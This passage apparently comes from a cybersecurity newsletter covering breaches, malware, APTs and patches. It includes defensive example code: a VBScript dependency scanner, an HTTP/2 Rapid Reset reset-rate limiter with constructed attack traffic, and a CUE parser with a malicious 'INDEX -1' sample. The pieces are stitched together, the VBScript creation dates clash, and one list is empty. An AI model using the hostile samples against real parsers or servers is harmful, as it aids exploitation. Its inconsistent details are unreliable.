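# Volume per event type: a quick read on whether this host is mostly a
# client of NTLM (8001) or is serving NTLM logons to others (8002).
$rows | Group-Object EventId | Select-Object @{ n = 'EventId'; e = { $_.Name } }, Count

# Full detail for the teams that own the dependent systems (path is my choice).
$out = Join-Path $env:TEMP 'ntlm-audit.csv'
$rows | Export-Csv -NoTypeInformation -Path $out
"Wrote $($rows.Count) NTLM audit rows to $out"
```

Only after the exported list stops showing legitimate dependencies does it make sense to move the same two policies from audit to block; until then, the CSV is the list of systems that still need Kerberos fixed or a service reconfigured.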


Breaches, hacks, and security incidents

3Commas hacked again: Cryptocurrency trading platform 3Commas has confirmed a security breach after hackers gained access to customer accounts and made unauthorized transactions. The company didn't reveal how much in funds was stolen. This is the company's second breach in the past year. It was also hacked in October of last year after a hacker gained access to its infrastructure and stole customer API keys.

Platypus hacked for the third time: DeFi trading service Platypus has lost more than $2 million worth of crypto assets after an attacker gained access to its systems. The incident marks the third time the platform was hacked this year after suffering similar breaches in January and July. It lost $8.5 million in the first hack and just $50,000 in the second.

FTX hack trail leads back to Russia: An Elliptic investigation found that some of the $477 million crypto assets stolen from cryptocurrency exchange FTX lead back to money laundering accounts that have ties with the Russian cybercrime ecosystem. [Additional coverage in Wired/non-paywall]

"A Russia-linked actor seems a stronger possibility. Of the stolen assets that can be traced through ChipMixer, significant amounts are combined with funds from Russia-linked criminal groups, including ransomware gangs and darknet markets, before being sent to exchanges. This points to the involvement of a broker or other intermediary with a nexus in Russia."

Shadow PC breach: Cloud gaming PC service Shadow has disclosed [archived] a security breach after some of the company's customer data was put up for sale on an underground hacking forum. The incident took place in September after one of its employees was socially-engineered in a Discord chat. The attacker compromised the employee's computer with malware, stole access cookies from the employee's browser, and then accessed the Shadow backend and stole customer data. The company says no passwords or financial data was stolen, but the attacker made off with most user personal data, such as names, emails, billing addresses, and dates of birth.

OneinStack supply chain attacks: Threat actors have compromised the servers of OneinStack, a one-click Linux server deployment utility. In two separate incidents in April and October this year, the attackers modified the OneinStack binaries and added code that would load and enable a secret backdoor. Chinese security firm QiAnXin says the code used in the two incidents suggests the same threat actor was behind both attacks. The OneinStack tool is very popular in China, where it is used by developers to deploy Linux servers on cloud infrastructure in various production-ready configurations.

23andMe: DNA and genetic testing service 23andMe has confirmed that hackers stole some data after initially denying they got hacked last week. The company is now resetting all user passwords. There's more to this story, but I can't tell what's b.s. and not, so I'll come back to this when things clear up. Meantime, you can read TechCrunch's coverage of what's what right now.

SEC is investigating Progress Software: The US Securities and Exchange Commission has launched a formal investigation into Progress Software, the company behind the MOVEit file-sharing server. According to a regulatory filing, Progress says the SEC has started a fact-finding investigation and is seeking documents from the company related to how the company handled a string of hacks of its MOVEit software earlier this year. Progress says the attacks have incurred $2.9 million in costs so far, but that $1.9 million has already been covered through its insurance. The company also expects to face additional losses, as it currently faces 58 class-action lawsuits, and at least 23 customers have announced their intention to ask for compensation related to the hacks. [Additional coverage in CybersecurityDive]

Steam malware incidents: Valve is requiring that all developers add a phone number to their account in order to publish new game updates on the Steam platform. The company made the decision after several developers had their accounts compromised and hackers pushed malware-laced game updates to some of its users. The phone number will be used for two-factor authentication. Developers will have to add a phone number by October 24, or they will be unable to update any of their games. 

General tech and privacy

Microsoft IRS audit: The US Internal Revenue Service has notified Microsoft that the company owes $28.9 billion in back taxes. The decision comes following an IRS audit that looked at how Microsoft allocated profits between countries and jurisdictions between 2004 and 2013. Microsoft says it plans to appeal the decision.

TETRA code going open-source: ETSI, the organization behind the TETRA communications protocol, is considering open-sourcing some of its newer protocols and algorithms after researchers found a series of backdoors in its code in July this year.

Chrome serves propaganda in Russia: An investigation has found that Google Chrome's Discover feed is serving up state-backed propaganda to Russian users. [Additional coverage in Bloomberg/non-paywall]

Quick Chrome history deletion: Google has announced a new feature for its Chrome browser that will allow users to quickly delete the last 15 minutes of their browsing history. The feature is different from incognito windows because it allows access to information like session cookies that would not usually be available in incognito mode. The feature can be found in the same place as the normal Clear Browsing History command.

Government, politics, and policy

Twitter in trouble in the EU: The European Union has sent a letter to Twitter this week warning that the company was spreading disinformation in the aftermath of the Hamas attacks on Israel. The EU Commissioner for Internal Market Thierry Breton has given Twitter CEO Elon Musk 24 hours to take action and respond to the letter. The company is very likely in violation of the EU's new Digital Services Act, which entered into effect at the end of August. Several news outlets found that Twitter was flooded with graphic content and disinformation, with Musk himself promoting some of the content. [Additional coverage in CNBC]

Delete Act: California Governor Gavin Newsom has signed a bill into law that allows Californians to request that their personal data be deleted from the servers of online companies. Named the Delete Act, the law is modeled after the EU's GDPR regulation. The law also tasks the California Privacy Protection Agency with creating a single portal where individuals could order data brokers registered in the state to delete their personal data. The agency must launch the portal by January 1, 2026. [Additional coverage in The Verge]

Netherlands investigates Yandex: The Dutch Data Protection Agency is investigating Yango, the ride-hailing app owned by Russian tech group Yandex. Officials fear Russian secret services might abuse the app to gather data on EU citizens. The app is facing similar investigations in Finland and Norway. [Additional coverage in ChannelNewsAsia]

Sponsor section

In this Risky Business News sponsor interview, Tom Uren asks Martin Cannard, VP of Product Strategy at Netwrix, how privileged access management can help defend organizations. "Advanced Persistent Teenagers" regularly use social engineering techniques to compromise highly privileged accounts, but that doesn't mean it's instantly game over.

Cybercrime and threat intel

Fair Russia is fair: Russian authorities have detained a Yekaterinburg man for including a Facebook button on the website of an NGO. The suspect was detained because Facebook is considered a terrorist organization in Russia and absolutely 100% not because he's the lead of a human rights organization that has sued the Russian government for the living conditions in its jails. Nope. Not that! [Additional coverage in Veved]

PyPI malware: DevSecOps companies Checkmarx and Phylum have discovered a series of malicious libraries on the PyPI portal, posing as the SDKs of various cloud service providers. The packages contained functional code but also included a hidden mechanism that stole any authentication tokens and credentials added by developers. So far, researchers have identified five malicious SDKs targeting AWS, Alibaba Cloud, Tencent, and Telegram services.

NuGet malware: Security researchers have found malicious NuGet packages infecting developer systems with the SeroXen RAT. Only a handful of malicious packages were discovered, all uploaded on NuGet by one developer account.

KEV update: CISA has updated its KEV database with five new vulnerabilities that are currently being exploited in the wild. The list includes the three zero-days from this week's Microsoft Patch Tuesday, a Cisco zero-day from last month, and an Adobe Reader bug that was patched back in January but is now being exploited.

LinkedIn Smart Links abuse: Threat actors are abusing a LinkedIn feature named Smart Links to bypass security email gateways. The feature is used by LinkedIn paying customers to track who clicks on their links by passing all traffic through the official LinkedIn domain. Researchers at Cofense say they've seen this feature abused for the first time in September 2022 and again in a new campaign started in July this year. The recent campaign leveraged a LinkedIn smart link but eventually redirected users to a phishing site that attempted to harvest their Microsoft credentials.

Magniber ransomware: AhnLab says the last time it detected the Magniber ransomware was on August 25, representing the longest period of inactivity for the ransomware gang since 2016.

"Since its initial appearance in 2016, Magniber has never taken a break from distribution for such a long period of time (usually resuming distribution with a new technique to bypass detection within 2 weeks to a month)."

DarkEye Stealer is back and free: CyFirma security researcher Kaushik Pal has discovered a threat actor distributing a version of the DarkEye Stealer for free. That's exactly what we needed—free advanced malware.

Anonymous Sudan Telegram stats: Threat intel analyst Julian B. has noticed that the follower count of the Anonymous Sudan Telegram channel has nearly doubled over the past week since the group has announced its intention to attack Israeli organizations in the aftermath of the Hamas attack on Israel.

Ransomware in Q3: CyberInt has a breakdown of ransomware operations in the third quarter of the year.

Malware technical reports

AvosLocker: CISA and the FBI have published an update for their malware report on the AvosLocker ransomware. The original report was published in March 2022, so it became outdated.

Qakbot: Blackberry looks at Qakbot, the botnet that was recently taken down by the FBI and EU authorities.

DarkGate: Trend Micro reports an uptick in campaigns distributing the new DarkGate loader via Skype and Microsoft Teams conversations.

Nexus: Two security researchers have found an SQLi vulnerability in the Nexus Android botnet and used it to gain access to its backend and gather intelligence on its operations. Nexus, a variant of the old SOVA Android botnet, launched earlier this year and was advertised on underground hacking forums.

SpyNote: WithSecure has published a report on the SpyNote Android malware and its Diehard service that makes shutting down and removing the malware from infected hosts as difficult as possible.

Sponsor Section

To protect your business, you need to understand and measure your attack surface and then implement a continuous, comprehensive approach to reducing it. Read Netwrix's guide to learn how to reduce your privileged attack surface and adopt a Zero Trust approach.

APTs and cyber-espionage

Storm-0062: A suspected Chinese cyber-espionage group is behind the recent attacks that have exploited a zero-day vulnerability in Atlassian Confluence servers. Tracked as CVE-2023-22515, the vulnerability was patched last week, but Microsoft says the group has been exploiting it since mid-September. Microsoft linked the attacks to a group the company tracks as Storm-0062. While the company didn't formally link the attacks to China, it says the same group is also known as DarkShadow and Oro0lxy. In 2020, the US Justice Department indicted an employee of China's Ministry of State Security named Li Xiaoyu, who operated using the "Oro0lxy" nickname and had been involved in MSS hacking campaigns for at least ten years.

ToddyCat: Check Point and Kaspersky have seen the ToddyCat APT executing a persistent hacking and cyber-espionage campaign against the telecom industry in Asia. The campaign has been active since 2021 and has targeted telecoms located in Vietnam, Uzbekistan, Pakistan, and Kazakhstan. The group has been previously linked to Chinese espionage interests.

Vulnerabilities, security research, and bug bounty

Patching priority confusion: A survey of 1,000 IT professionals found that vulnerability scanning and management tools often produce different results that confuse DevOps teams. Nearly three-quarters of respondents say their organizations can take anywhere from two weeks to a month to patch known critical vulnerabilities. Respondents say they spend too much time determining what needs to be fixed first, which has impacted their delivery schedules throughout the past year and even their bottom lines.

cURL security update: The cURL library has patched a rare security vulnerability in its code. The bug is tracked as CVE-2023-38545, and it's a heap buffer overflow in the library's SOCKS5 proxy handshake. The library's author has a write-up here.

Magento patch: A major vulnerability has been fixed in the Adobe Commerce platform and the Magento open-source project. The vulnerability allows threat actors to bypass authentication procedures and hijack any Magento customer account. Patches have been released this week as part of Adobe's Patch Tuesday updates. A technical analysis of the bug will be available via SanSec.

Apple security updates: Apple has backported its recent patches against two zero-days to its older iOS 16.x branch. Initial patches for the iOS 17.x branch were delivered last week.

Squid vulnerabilities: Security researcher Joshua Rogers has discovered 55 vulnerabilities in the highly popular Squid caching proxy. The vulnerabilities were found during a security audit that began in February 2021. Of the 55 vulnerabilities, Rogers says the Squid Team only managed to patch 20. Rogers blamed the lack of patches for all issues on the team's understaffing. The Squid proxy is one of today's most ubiquitous apps, with more than 2.5 million instances available online.

"The Squid Team have been helpful and supportive during the process of reporting these issues. However, they are effectively understaffed, and simply do not have the resources to fix the discovered issues. Hammering them with demands to fix the issues won't get far."

Yifan vulnerabilities: Cisco Talos researchers have discovered ten vulnerabilities in Yifan YF325, a cellular router used in industrial networks. All ten vulnerabilities are rated critical and have a severity score of 9.8/10. All ten remain unpatched after the vendor failed to respond to Cisco's disclosure attempts.

OctoPrint vulnerability: Numen Labs has found a vulnerability (CVE-2023-41047) in OctoPrint, the web interface for 3D printers, that can be abused to execute arbitrary commands.

WS_FTP exploitation: SentinelOne has a write-up of the recent attacks targeting WS_FTP servers.

Windows zero-day report: Google Project Zero has a technical write-up on CVE-2023-36802, a zero-day in the Windows Kernel Streaming Server that Microsoft patched in September. IBM published a similar report earlier this week.

Microsoft AI Bug Bounty Program: Microsoft has announced a new bug bounty program that will pay bug hunters for issues in the company's Bing AI system. Rewards can go up to $15,000.

Infosec industry

Acquisition news: Cybersecurity firm Arctic Wolf has announced plans to acquire security orchestration, automation, and response (SOAR) platform Revelstoke.

New tool—CCB Browser Extension: The Belgian government has developed a Chrome browser extension that shows trustworthiness scores for websites and warns users of phishing attempts.

New tool—machofile: Security researcher Pasquale Stirparo has open-sourced machofile, a tool for parsing Mach-O binary files.

Useful tool: OSINT threat analyst Cipher387 has put together a list of APIs that can be used for OSINT investigations.

Useful tool: Another useful tool is Dangerzone, a tool from the Freedom of the Press Foundation that takes suspicious PDFs and converts them into safe-to-view documents.

Ransomware payments: A Splunk survey of 350 CISOs found that 96% worked for companies that got hit by ransomware over the past year, and a whopping 83% ended up paying the attackers. The survey found that the vast majority paid the attackers through an intermediary, such as a negotiator or their cyber insurance provider. A quarter of all paid ransoms were above $250,000, making the attacks a very lucrative business for ransomware gangs. [Additional coverage on the Splunk website]

"The cyber insurance process has changed over the past few years. It is getting to the point where we are wondering if it is worth our time."

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq examine the opportunities that ransomware gangs and business email compromise/romance scammers have to collaborate.

Risky Biz News: Microsoft deprecates VBScript

11 October 2023 at 00:30

This newsletter is brought to you by Netwrix, an IT security software company that enables security professionals to strengthen their security and compliance posture across all three primary attack vectors: data, identity, and infrastructure. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

Microsoft has deprecated VBScript, a powerful scripting language that has been part of the Windows operating system since 1998.

VBScript has been made a "Feature on Demand" (FoD), and Microsoft plans to remove it completely in a future version of Windows.

As a FoD, Microsoft says VBScript will be preinstalled on Windows OS images but not enabled by default.

It's quite a rare case for Microsoft to move an older feature to a FoD before removing support. The company says it's doing this "to allow for uninterrupted use while [users] prepare for the retirement of VBScript."

Microsoft made the major announcement in a short statement on Monday but without a clear timeline for VBScript's permanent removal.

While VBScript has a large fanbase among system administrators, the language itself has been left for dead for more than a decade, with the last significant release, VBScript 5.8, coming in 2010.

Since then, Microsoft has replaced VBScript with a much more powerful scripting language named PowerShell.

In 2019, Microsoft also removed VBScript from its Internet Explorer browser in a move that signaled that VBScript's end was nigh.

While the reasons to remove VBScript support most likely lie with PowerShell being a superior tool, VBScript's removal will have a huge security impact as well.

VBScript has been and remains a popular tool amongst malware developers, even today, 27 years after its creation back in 1996. It is not as popular as it once was, but there are still malware gangs using it here and there.

Just like Microsoft dropping support for macros in Office applications, the move is most likely to trigger a shift in how malware will be written and distributed. It will not be a massive shift since all the big-boy gangs have been using PowerShell for a while now, but the older gangs and the copy-pasta malware devs will most likely be impacted.

Back in March this year, Neowin reported that VBScript was most likely headed for the bin later this fall. VBScript's move to a FoD is most likely taking place with a Patch Tuesday update this or next month. Look for VBScript in the "optional features" section going forward.
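For admins who want to know what will break when the FoD eventually disappears, here is an added example that is not code from the newsletter or from Microsoft: it reports whether a VBScript capability is listed on the current build and then inventories the local places that still launch scripts through wscript/cscript or reference a .vbs file (scheduled task actions and the Run/RunOnce autostart keys). The `'*VBSCRIPT*'` capability name filter is an assumption, so compare it against what `Get-WindowsCapability` actually lists on your build; the regex and the two autostart locations are my choices, not an exhaustive list of where VBScript can be invoked. Run it elevated.

```powershell
# Added example (not from the newsletter or Microsoft): find local VBScript
# dependencies before the VBScript Feature on Demand is removed. Run elevated.

# Matches wscript/cscript hosts (with or without .exe) or any .vbs file reference
$scriptHostPattern = '(?i)\b[wc]script(\.exe)?\b|\.vbs\b'

# 1. Is VBScript listed as a capability (FoD) on this build, and in what state?
#    The name filter is an assumption; adjust it to what your build reports.
$cap = Get-WindowsCapability -Online | Where-Object Name -like '*VBSCRIPT*'
if ($cap) { $cap | Select-Object Name, State }
else { 'No VBScript capability listed; on this build VBScript is still a built-in component.' }

# 2. Scheduled tasks whose actions launch a script host or a .vbs file
$taskHits = foreach ($t in Get-ScheduledTask) {
    foreach ($a in $t.Actions) {
        # Non-exec actions (COM handlers) have no Execute/Arguments and yield an empty string
        $cmd = ("$($a.Execute) $($a.Arguments)").Trim()
        if ($cmd -match $scriptHostPattern) {
            [pscustomobject]@{ Source = 'ScheduledTask'; Name = "$($t.TaskPath)$($t.TaskName)"; Command = $cmd }
        }
    }
}

# 3. Run / RunOnce autostart entries (machine and current user) doing the same
$runKeys = foreach ($hive in 'HKLM', 'HKCU') {
    foreach ($k in 'Run', 'RunOnce') { "${hive}:\SOFTWARE\Microsoft\Windows\CurrentVersion\$k" }
}
$runHits = foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($name in $props.PSObject.Properties.Name) {
        if ($name -like 'PS*') { continue }   # skip provider metadata (PSPath, PSDrive, ...)
        $val = [string]$props.$name
        if ($val -match $scriptHostPattern) {
            [pscustomobject]@{ Source = 'Autostart'; Name = "$key\$name"; Command = $val }
        }
    }
}

$hits = @($taskHits) + @($runHits)
if ($hits) { $hits | Format-Table -AutoSize -Wrap }
else { 'No scheduled task or autostart entry on this host references a VBScript host or .vbs file.' }
```

The same regex can be pointed at other inventories you already collect (logon scripts in Group Policy, process creation events, software deployment scripts); the point is to have the list of legitimate users in hand before the feature is switched off, the same data-driven approach Microsoft describes for NTLM above.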

Image via XenoPanther

Breaches, hacks, and security incidents

Hacker returns HTX funds: The hacker who stole $8 million from the HTX cryptocurrency platform has returned all the stolen funds. Formerly known as Huobi, the company has confirmed the refunds and a $400,000 "whitehat reward." The hacker returned the funds two weeks after the original theft. [Additional coverage in Cryptopolitan]

Air Europa skimming incident: Spanish airline Air Europa has disclosed a security breach after it found a web skimmer on its online website.

SK NEC hack: North Korean hackers have breached South Korea's National Election Commission and stolen confidential information. The hack took place in April 2021 but was only disclosed this week. South Korea's National Intelligence Service (NIS) has attributed the intrusion to a North Korean hacking group known as Kimsuky. Officials say the hack compromised the email account of one of the commission's workers but did not say what information the hackers stole. [Additional coverage in NKEconomy]

Attacks on Israel's rocket alerting system: Pro-Palestine hacktivist groups have launched several cyberattacks that targeted Israel's rocket alert system. DDoS attacks hit endpoints responsible for alerting citizens of incoming missile raids, even as early as one hour after the Hamas operation began. Several groups participated in the attacks, such as Anonymous Sudan, Killnet, and AnonGhost. The latter also exploited vulnerabilities in the API system of Red Alert, an Android app that sends rocket alerts to Israeli citizens. The group abused the API to send fake rocket and nuclear bomb alerts meant to sow panic among the Israeli population. [Additional coverage in the Washington Post/non-paywall]

General tech and privacy

Rust in Android: Google says it has started to use the Rust programming language to rewrite parts of the Android kernel. The company has already been using Rust for some Android userland processes since last year. So far, Google developers have rewritten the Android Virtualization Framework's protected VM (pVM) firmware in Rust, but more components will follow.

Google makes passkeys default sign-in: Google is making passkeys the default sign-in option for all Google online accounts. The company will begin showing prompts to all users to enroll a passkey in the coming weeks. Enrolling will require users to register a fingerprint, a facial scan, or a PIN code on a laptop or smartphone they own. The next time users log into their Google accounts, they'll have to authenticate on the device with the passkey of their choosing and skip entering a password or MFA code.

Government, politics, and policy

US joint guidance: CISA, the FBI, the NSA, and the US Treasury have published a joint advisory on improving the security of open source software (OSS) in operational technology (OT) and industrial control systems (ICS).

India investigates Xiaomi and Vivo: Indian authorities have launched an investigation into Chinese companies Xiaomi and Vivo Mobile for allegedly funding an Indian website that was spreading pro-Chinese propaganda. [Additional coverage in Reuters]

Vietnam is a Predator customer: A threat actor tracked as REPLYSPY has used Twitter replies as a means to distribute infection links for the Predator spyware. The links were posted online earlier this year as replies to tweets from EU and US officials, journalists, and experts on Southeast Asian issues. Experts believe the group tried to infect the officials, as well as some of their more important followers. Independent reports from Amnesty International and CitizenLab claim the Vietnamese government is behind the REPLYSPY group after it became a customer of the Intellexa alliance in 2020.

Sponsor section

In this Risky Business News sponsor interview, Tom Uren asks Martin Cannard, VP of Product Strategy at Netwrix, how privileged access management can help defend organizations. "Advanced Persistent Teenagers" regularly use social engineering techniques to compromise highly privileged accounts, but that doesn't mean it's instantly game over.

Cybercrime and threat intel

HelloKitty leak: The source code of the HelloKitty ransomware has been leaked on an underground hacking forum, per threat intel analyst 3xp0rt. The ransomware was first spotted in late 2020, was also known as FiveHands, and its dark web leak site was last seen online in November 2021. The group's main claim to fame is the attack on Polish gaming studio CD Projekt Red, the maker of the Witcher and Cyberpunk games.

Postal service phishing: KrebsOnSecurity looks at the increase in phishing operations impersonating USPS and 12 other US postal services.

Israel-Palestine hacktivism: Threat intel analyst CyberKnow is maintaining a list of hacktivist groups that announced their involvement in the Israel-Palestine hostilities. The list includes 50 groups, with 48 on Palestine's side.

HTTP/2 Rapid Reset: Google, Amazon, and Cloudflare have disclosed a new DDoS technique named Rapid Reset. It abuses HTTP/2's stream cancellation feature: a client opens a stream with a request and immediately cancels it with an RST_STREAM frame, then repeats this at high rate over the same connection. Because a cancelled stream no longer counts against the server's concurrent-stream limit, a single connection can push far more request work into the server than the protocol's limits were meant to allow. All three companies say the technique was used in August and September to launch some of the largest attacks they have ever seen. The largest hit Google Cloud and clocked in at 398 million requests per second, almost nine times the previous record of 46 million requests per second. Patches, tracked under CVE-2023-44487, have started rolling out for web servers and HTTP/2 libraries.
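
The mitigation most implementations shipped for CVE-2023-44487 is a per-connection limit on how many streams a client may reset. The script below is an added example written for this newsletter, not code from Google, Amazon, Cloudflare, or any HTTP/2 server: it models the counting logic over a constructed frame log, where a connection whose recent streams are overwhelmingly client-cancelled is marked for GOAWAY. The thresholds, the `END` pseudo-frame standing in for the server finishing a response, and both traffic generators are assumptions made for the demonstration.

```python
# Added example, not code from any HTTP/2 implementation: a per-connection
# cancelled-stream rate limiter of the kind used to mitigate Rapid Reset.
from collections import defaultdict, deque

WINDOW_FRAMES = 100    # assumption: judge a connection on its last 100 finished streams
MAX_RESET_RATIO = 0.5  # assumption: close it when more than half of those were client-cancelled
MIN_SAMPLE = 20        # assumption: never judge a connection on fewer than 20 streams


class ConnectionState:
    """Per-connection bookkeeping kept by the (hypothetical) server."""

    def __init__(self):
        self.open_streams = set()
        self.recent = deque(maxlen=WINDOW_FRAMES)  # True = cancelled by client, False = completed
        self.closed = False
        self.reason = None


def process_frames(frames):
    """frames: iterable of (conn_id, frame_type, stream_id) in arrival order.

    frame_type is 'HEADERS' (client opens a stream), 'RST_STREAM' (client cancels it)
    or 'END' (constructed stand-in for the server finishing the response).
    Returns {conn_id: ConnectionState}; a connection over the threshold is marked
    closed, which is where a real server would send GOAWAY and drop the socket.
    """
    conns = defaultdict(ConnectionState)
    for conn_id, ftype, sid in frames:
        st = conns[conn_id]
        if st.closed:
            continue  # GOAWAY already sent: ignore anything else from this peer
        if ftype == "HEADERS":
            st.open_streams.add(sid)
            continue
        if ftype not in ("RST_STREAM", "END") or sid not in st.open_streams:
            continue  # unknown stream or frame type: nothing to count
        st.open_streams.discard(sid)
        st.recent.append(ftype == "RST_STREAM")
        # Rapid Reset leaves almost nothing in open_streams (so a concurrent-stream
        # limit never fires) but fills `recent` with cancellations; that is what we test.
        if len(st.recent) >= MIN_SAMPLE:
            ratio = sum(st.recent) / len(st.recent)
            if ratio > MAX_RESET_RATIO:
                st.closed = True
                st.reason = f"GOAWAY: {ratio:.0%} of the last {len(st.recent)} streams were reset by the client"
    return conns


def rapid_reset_frames(conn_id, n):
    """Constructed attacker traffic: open n streams and cancel each one immediately."""
    out = []
    for i in range(n):
        sid = 2 * i + 1  # client-initiated streams use odd IDs
        out.append((conn_id, "HEADERS", sid))
        out.append((conn_id, "RST_STREAM", sid))
    return out


def normal_frames(conn_id, n):
    """Constructed browser traffic: n streams, most completed, one in ten cancelled
    (a user navigating away before the response arrives)."""
    out = []
    for i in range(n):
        sid = 2 * i + 1
        out.append((conn_id, "HEADERS", sid))
        out.append((conn_id, "RST_STREAM" if i % 10 == 9 else "END", sid))
    return out


if __name__ == "__main__":
    result = process_frames(rapid_reset_frames("attacker", 50) + normal_frames("browser", 50))
    for cid, st in result.items():
        print(cid, "closed" if st.closed else "open", st.reason or "")
```

The attacker connection is cut off after its first twenty cancellations, while the browser connection, at a 10% cancel rate, is never touched. Real servers keep this state inside the protocol layer and also bound the absolute number of resets per interval; the ratio here is only the simplest shape of that check.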

Malware technical reports

Magecart campaign hides in 404 pages: A threat actor is hacking online stores and hiding malicious web skimmer code in their 404 error pages. The campaign has been active for a couple of weeks and has targeted stores running Magento and WooCommerce. Akamai says that when customers reach checkout, a loader on the hacked site fetches the skimmer payload from the store's own 404 page, a location defenders rarely inspect. The skimmer overlays a fake payment form that collects the shopper's personal and card details and sends them to an attacker-controlled server.

IZ1H9 botnet: Throughout September 2023, the IZ1H9 botnet has expanded its exploit arsenal with 13 new vulnerabilities. This includes exploits in D-Link devices, Netis wireless routers, Sunhillo SureLine surveillance systems, Geutebruck IP cameras, Yealink Device Management systems, Zyxel devices, TP-Link Archer routers, Korenix Jetwave access points, and TOTOLINK routers.

ADVobfuscator: OALABS looks at how malware authors are abusing the ADVobfuscator library to obfuscate their code.

Sponsor Section

To protect your business, you need to understand and measure your attack surface and then implement a continuous, comprehensive approach to reducing it. Read Netwrix's guide to learn how to reduce your privileged attack surface and adopt a Zero Trust approach.

APTs and cyber-espionage

Caracal Kitten: Chinese security firm QiAnXin has discovered a new APT group spreading Android malware to members of the Kurdish population. Named Caracal Kitten, or APT-Q-58, the group hid its malware in apps posing as news portals and the official app for the Kurdistan Democratic Party (KDP). While no formal attribution has been made, QiAnXin says the group's target selection overlaps with past Iranian operations.

Grayling: A new APT group named Grayling has conducted cyber-espionage campaigns since February this year. The group has heavily targeted Taiwanese organizations, leading researchers to believe there might be a China nexus. Besides Taiwan, other targets included a government agency located in the Pacific Islands, as well as organizations in Vietnam and the US.

DPRK operations: Google's Mandiant division has published an updated guide to understanding North Korea's APT and cyber operations, complete with an updated organizational chart. The report's main findings are that DPRK groups now increasingly share resources and temporarily collaborate on operations, making exact attribution extremely difficult.

"Malware infrastructure overlaps indicating resources and attribution muddled by shifting assignments show how DPRK cyber operations are changing. However, operations conducted to fulfill regime requirements remain steadfast and we believe they will continue. While defenders may not be able to easily sort new DPRK activity into a previously identified bucket, the malware reuse and shared resources creates opportunities for detection and country level attribution."

Vulnerabilities, security research, and bug bounty

Patch Tuesday: Yesterday was the October 2023 Patch Tuesday. We had security updates from Adobe, Microsoft, SAP, Citrix, Fortinet, Kubernetes, and Siemens. The Android Project, Apple, Chrome, Cisco, Atlassian, Supermicro, QNAP, and Drupal released security updates last week as well.

Microsoft zero-days: This month, Microsoft's Patch Tuesday included 105 fixes, including three zero-days tracked as:

Libcue vulnerability: The GitHub security team has found a major vulnerability in libcue, a small library for parsing CUE sheets, the metadata files that describe the track layout of an audio disc. Tracked as CVE-2023-43641, the bug affects Linux distros that ship the GNOME desktop, where libcue is pulled in by GNOME's file indexer (tracker-miners). Because the indexer automatically parses newly created files in directories such as ~/Downloads, a malicious CUE file can gain code execution as soon as it is downloaded, without the user ever opening it.
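
The defect behind CVE-2023-43641 was an INDEX number read straight from the CUE sheet and used as an array position without a range check, so a negative value turned into an out-of-bounds access. The parser below is an added example written for this newsletter, not libcue's code: it handles only the TRACK and INDEX lines, applies the range check that a native parser must also apply, and refuses a constructed sheet carrying `INDEX -1`. The sample sheets and the `cue_is_well_formed` wrapper are assumptions made for the demonstration.

```python
# Added example, not libcue's code: a minimal CUE sheet parser that validates
# TRACK and INDEX numbers before using them as positions.
import re

MAX_INDEX = 99  # CUE INDEX and TRACK numbers are two digits, 00..99
INT = re.compile(r"[+-]?\d+")
TIME = re.compile(r"\d{2}:\d{2}:\d{2}")  # mm:ss:ff


class CueError(ValueError):
    """Raised for any CUE sheet content this parser refuses to trust."""


def _number(token, lineno):
    if not INT.fullmatch(token):
        raise CueError(f"line {lineno}: {token!r} is not a number")
    return int(token)


def parse_cue(text):
    """Parse TRACK and INDEX lines into a list of tracks.

    Each track is {'number': int, 'mode': str, 'indexes': {index_no: 'mm:ss:ff'}}.
    Out-of-range TRACK or INDEX numbers raise CueError instead of being used as
    positions; a native parser that skips this check indexes outside its fixed-size
    index array, which is the bug class behind CVE-2023-43641.
    """
    tracks = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts:
            continue
        keyword = parts[0].upper()
        if keyword == "TRACK":
            if len(parts) < 3:
                raise CueError(f"line {lineno}: malformed TRACK line")
            number = _number(parts[1], lineno)
            if not 1 <= number <= MAX_INDEX:
                raise CueError(f"line {lineno}: TRACK number {number} out of range")
            tracks.append({"number": number, "mode": parts[2], "indexes": {}})
        elif keyword == "INDEX":
            if not tracks:
                raise CueError(f"line {lineno}: INDEX before any TRACK")
            if len(parts) < 3:
                raise CueError(f"line {lineno}: malformed INDEX line")
            index_no = _number(parts[1], lineno)
            if not 0 <= index_no <= MAX_INDEX:  # the check whose absence makes "INDEX -1" dangerous
                raise CueError(f"line {lineno}: INDEX number {index_no} out of range")
            if not TIME.fullmatch(parts[2]):
                raise CueError(f"line {lineno}: bad INDEX time {parts[2]!r}")
            tracks[-1]["indexes"][index_no] = parts[2]
        # FILE, TITLE, PERFORMER and friends carry no array positions; ignored here
    return tracks


def cue_is_well_formed(text):
    """Convenience wrapper: True if parse_cue accepts the sheet, False if it rejects it."""
    try:
        parse_cue(text)
        return True
    except CueError:
        return False


# Constructed samples: a benign two-track sheet and one carrying the negative INDEX
# that an unchecked parser would turn into an out-of-bounds array access.
BENIGN_CUE = """\
FILE "album.wav" WAVE
  TRACK 01 AUDIO
    TITLE "Intro"
    INDEX 01 00:00:00
  TRACK 02 AUDIO
    INDEX 00 03:10:00
    INDEX 01 03:12:00
"""

MALICIOUS_CUE = """\
FILE "x.wav" WAVE
  TRACK 01 AUDIO
    INDEX -1 00:00:00
"""

if __name__ == "__main__":
    print(parse_cue(BENIGN_CUE))
    print("malicious sheet accepted:", cue_is_well_formed(MALICIOUS_CUE))
```

The point is not the Python parser itself but where the check sits: every value that ends up as an array index, a length, or an offset has to be range-checked at the parse boundary, before any file-derived number touches memory layout.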

Cobalt Strike update: Fortra has released a security update (v4.9.1) for the Cobalt Strike framework. Also in CS news, v4.9 has been leaked on hacking forums and is likely to be adopted by threat actors soon.

Windows zero-day report: IBM's X-Force team has a technical write-up on CVE-2023-36802, a zero-day in the Windows Kernel Streaming Server that Microsoft patched last month, in September, and which IBM's Valentina Palmiotti helped discover.

EDR bypass: Wavestone researchers have found an EDR bypass in Windows that abuses a lesser-known native API, NtSetInformationProcess.

"In conclusion, the mechanism described in this article actually allows an elevated malicious program wishing to perform nefarious actions (process injection, LSASS dumping, process hollowing, etc.), to carefully disable related telemetry before doing it, removing critical evidence from EDR monitoring, thus greatly improving its chances of not being detected. Multiple pieces of evidence show that Microsoft is aware of the weakness, but is not changing the API behavior retroactively on Windows 10, likely due to retro-compatibility issues."

Infosec industry

